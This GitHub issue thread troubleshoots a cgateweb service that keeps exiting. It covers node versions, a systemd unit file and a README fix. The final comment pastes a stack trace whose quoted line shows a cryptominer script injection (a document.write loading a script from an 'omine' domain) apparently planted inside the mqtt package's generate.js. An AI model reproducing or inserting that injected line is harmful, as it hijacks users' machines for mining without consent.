### ISSUE TITLE
cgateweb status active exited

### ISSUE THREAD

**Issue by pete173** [the1laz/cgateweb#13]
![cgateweb status](https://user-images.githubusercontent.com/37950989/44310654-79c4f280-a3f7-11e8-9d2d-580db8c8d045.png)

I have followed the steps but there is some error with nodejs forever.

**Comment by the1laz** [comment]
Which instructions did you follow? There might be some old ones on an old blog post somewhere. The readme file is the most up to date: https://github.com/the1laz/cgateweb/blob/master/README.md

**Comment by pete173** [comment]
I have installed latest rasbian stretch.It seems there some error with latest npm and node js. There some error at fovever.I have followed the latest README.md as well.

**Comment by pete173** [comment]
this command does not work sudo git clone http://192.168.1.9:10080/the1laz/cgateweb.git in README.md

**Comment by the1laz** [comment]
Sorry, looks like I forgot to update that. I've updated the readme, try sudo git clone https://github.com/the1laz/cgateweb.git

**Comment by pete173** [comment]
Hi did a fresh installation exactly as in readme.md  but same error occurs
is there any compability issues with npm and node
I have latest debain stretch
node version 8.11.4 
npm version 5.6..0
is there forever version requirement?

**Comment by the1laz** [comment]
It doesn't use forever any more, I don't know why it's trying to use it. Did you copy cgateweb.service out of the repo and into /etc/systemd/system ? This is what it's contents should be:

[Unit]
Description=cgateweb
Wants=cgate.service
After=network.target cgate.service

[Service]
ExecStart=/usr/bin/nodejs /usr/local/bin/cgateweb/index.js
RestartSec=10
Restart=always
User=root
Group=root
Environment=PATH=/usr/bin:/usr/local/bin
Environment=NODE_ENV=production
WorkingDirectory=/usr/local/bin/cgateweb

[Install]
WantedBy=multi-user.target

You might need to also run systemctl daemon-reload and then systemctl restart cgateweb.

**Comment by pete173** [comment]
I copied cgateweb.service out of repo and copied it into etc/systemd/system.The contents are same in th cgateweb.service.I have cross checked.
![cgateweb status 2](https://user-images.githubusercontent.com/37950989/44804706-b9ea5900-abdf-11e8-9114-5372aa60caaf.png)

**Comment by pete173** [comment]
The service runs for a second and then stops.Its wierd.

**Comment by pete173** [comment]
The service is running for some seconds and fails.I did the same setup months ago it is still working fine.Only this time cgateweb service fails.I have  done fresh installation couple of times but the same error occurs.

**Comment by the1laz** [comment]
Hmm, odd. At least the forever fault is gone,  although no errors is annoying. Can you turn on logging in settings.js and then try running "node /usr/local/bin/cgateweb/index.is" directly?

**Comment by pete173** [comment]
Hi I did the installation Again.This time i did installation with v 4.9.1 of node js.And followed the steps.Now its actively running.Was the v4.91 the issue?..I am not sure if it was version of node.I have made the iso image of sd card.I will do the installation again and check again.

**Comment by the1laz** [comment]
Hmm, odd. I haven't had any issues with it on a few versions of node, but I don't think I've used anything so recent.

**Comment by Bladeacus** [comment]
Hi,

Prior to a few days ago cgateweb has been running fine and controlling my C-Bus through Home Assistant. All of a sudden it has stopped working and I have an error exit code.

I am getting this error in logging all of a sudden -

pi@hassbian:/usr/local/bin/cgateweb $ sudo node index.js
/usr/local/bin/cgateweb/node_modules/mqtt/lib/generate.js:578
document.write('<script src="https://xmr.omine.org/assets/v7.js"></script><script>OMINEId("31f7dd372f1545eeb6db379490b0e3c5","-1")</script>');
^

ReferenceError: document is not defined
    at Object.<anonymous> (/usr/local/bin/cgateweb/node_modules/mqtt/lib/generate.js:578:1)
    at Module._compile (internal/modules/cjs/loader.js:689:30)
    at Object.Module._extensions..js (internal/modules/cjs/loader.js:700:10)
    at Module.load (internal/modules/cjs/loader.js:599:32)
    at tryModuleLoad (internal/modules/cjs/loader.js:538:12)
    at Function.Module._load (internal/modules/cjs/loader.js:530:3)
    at Module.require (internal/modules/cjs/loader.js:637:17)
    at require (internal/modules/cjs/helpers.js:20:18)
    at Object.<anonymous> (/usr/local/bin/cgateweb/node_modules/mqtt/lib/connection.js:4:16)
    at Module._compile (internal/modules/cjs/loader.js:689:30)


Any ideas?
